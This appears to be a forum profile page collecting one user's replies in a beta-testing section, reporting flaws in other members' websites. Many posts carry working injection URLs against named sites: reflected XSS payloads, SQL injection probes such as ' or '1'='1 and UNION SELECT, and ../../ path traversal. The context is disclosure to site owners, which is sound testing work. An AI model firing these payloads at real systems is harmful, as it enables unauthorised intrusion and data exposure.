source
Members-
Posts
100 -
Joined
-
Last visited
Never
Everything posted by source
-
released my third beta, online music storage and playback
source replied to s0c0's topic in Beta Test Your Stuff!
http://www.mp3crib.com/mymusic_upload.php?user=%22%3E%3Cmarquee%3Eownd&uid=759&dir=131-lol-bc49eb also you can xss the uid field: http://www.mp3crib.com/mymusic_upload.php?user=%22%3E%3Cmarquee%3Eownd&uid=%3Cscript%3Ealert(1);%3C/script%3E -
i'll tell you... dis-allowing registeration if they have registered from that IP previously is dumb. people have ips that change and other people use them... etc... and besides my sister/brother may want to play
-
you dont need to strip just < and > because I'm sure you can bypass that.... (depending on how it's parsed afaik) and just use strip tags...
-
i register a nick with html code. I create page with html code. disabling javascript for making a page w/ price == creates page with code as price (I think that's what happned0
-
yeah,, and just what I meant was I was able to get it to spit out HTML code on the page.
-
I just got a vector. Not sure I think I made a page, went to edit it, and then changed the edit page to "><marquee>ownd... it spit out some html code.. after I clicked submit http://www.fast.st/zapwiki/demo/index.php?p=code.skin wow. I just realized... you allowed us to edit the skin of every user and page????
-
good job on the forums. 2 things I noticed. 1) when you view the members page you notice that there are two members name testuser... 2) I can not register it says "passwords" do not match and they do
-
php man I didn't call it hacking. I told you what I found.
-
http://www.fast.st/zapwiki/demo/index.php?p=%22%3E%3Cmarquee%3Eownd&action=source creating a page with code works. http://www.fast.st/zapwiki/demo/index.php?p=%22%3E%3Cmarquee%3Eownd
-
AH sorry man I forgot since it was soo long... And ok about the URL tho I find that very annoying. (just an opinion)
-
re-read my post... I said "when registering" and uhm... not to start flame war but what does learning php have to do with javascript? It's completly unfiltered input (the email when I view the source of the page of my profile.)
-
use javascript to check shit == dumb... on register I was able to register with my email as <script>alert(1);</scritpt> etc. and <marquee>ownd.
-
http://www.sentry.dreamhosters.com/index.php?action=posts&forum=1&id=%22%3E You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE topic_id='\">'' at line 1
-
http://www.fast.st/zapwiki/welcome/index.php?p=solutions.tips xss vuln when submitting a tip and having the url the same the whole time is rather annoying and does nothing to stop attacks on your site. logging out does not work.
-
uhm how can we test anything if we keep getting permission denied to even make a page.?
-
no? I'm getting a fatal error message and need to make a new account.
-
yeah I know/knew but I had *nothing else to do... but today atleast there was a couple sites to look at.
-
http://www.babble-net.com/?action=ViewBoard&id=%22%3E%3Cscript%3Ealert(1);%3C/script%3E errors... and wtf you have some funky crap going on... I go to try and exploite it and I get some weird ass error and can not look @ forums anymore, unless I make a new account http://www.babble-net.com/?action=ViewThread&id=48&pid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E 1) xss 2) uhm wtf is up with your sql ? http://www.babble-net.com/?action=ViewThread&id=48&pid=1973638458 (notice: I posted it as a blank user... hmm.. lemme try changing name to admin) start using sessions for *EVERYTHING*... I change my cookie (get some error) and lawl @ it because it doesnt do anything...
-
I registered the nick "<marquee>shit" and it works... http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=\%22%3E%3Cmarquee%3Eownd%20bitch omfg tooo many xss/holes... http://blokdudez.110mb.com/forum/make_topic.php?path=../../ path disclosure. messages == xssable... fix the holes then try again, and use DB instead of w/e you are currently doing. http://blokdudez.110mb.com/forum/show_post.php?cat=../../
-
http://espsoftwaresolutions.com/admin/admin.php?page=1 and this I was prompted with a login (which had the username and pass there IDK if it was supposed to) it's vulnerable to all sorts of nasty stuff. http://espsoftwaresolutions.com/admin/moreinfo.php?id=-1 Full path disclosure. http://espsoftwaresolutions.com/tsupport/
-
http://espsoftwaresolutions.com/core/1-forum.html I can modify (edit) anyones post.
-
http://espsoftwaresolutions.com/core/blogger.php?uname='%20or%20'1'='1 errorz http://espsoftwaresolutions.com/core/blogger.php?action=delete&blog_id=%22%3E%3Cscript%3Ealert(%22source%20r%201337%22);%3C/script%3E http://espsoftwaresolutions.com/core/blogger.php?blogid="><marquee>ownd http://espsoftwaresolutions.com/core/blogger.php?action=comment&blog_id=4&commentto=%22%3E%3Cmarquee%3Eownd http://espsoftwaresolutions.com/core/messenger.php?action=reply&message_id=28 Not a exploit but at the buttom there is the delete and reply options, but are php variables but the value of themis not shown.
-
if thats your store you have a sql injection vuln hub.php?hid=10%20UNION%20SELECT%20null,null,null,null oh, and here: http://outsidehub.com/ohub_out.php?aout='%20or%20'1'='1 4 columns am I right?
-
i meant for example I could edit index.php...
-
directory /home/test/ is still viewable...